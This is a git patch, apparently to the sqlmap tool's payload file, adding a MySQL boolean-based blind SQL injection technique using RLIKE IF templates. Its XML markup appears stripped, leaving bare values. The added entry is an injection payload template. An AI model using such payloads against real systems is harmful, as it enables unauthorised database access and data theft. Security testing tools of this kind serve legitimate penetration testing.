From d6d8d54eda12bdd9f63acab6ce061c6c700a33f2 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sat, 22 Jan 2011 00:06:27 +0000 Subject: [PATCH] implemented Johannes Dahse / Reiners' technique --- xml/payloads.xml | 20 ++++++++++++++++++++ 1 file changed, 20 insertions(+) diff --git a/xml/payloads.xml b/xml/payloads.xml index ba0fb9e0a..b6adbf466 100644 --- a/xml/payloads.xml +++ b/xml/payloads.xml @@ -552,6 +552,26 @@ Formats: OR NOT [RANDNUM]=[RANDNUM1] + + + MySQL boolean-based blind - WHERE or HAVING clause (RLIKE - comment) + 1 + 3 + 1 + 1 + 1 + RLIKE IF([INFERENCE],[ORIGVALUE],0x28) + + RLIKE IF([RANDNUM]=[RANDNUM],[ORIGVALUE],0x28) + # + + + RLIKE IF([RANDNUM]=[RANDNUM],[ORIGVALUE],0x28) + +
+ MySQL +
+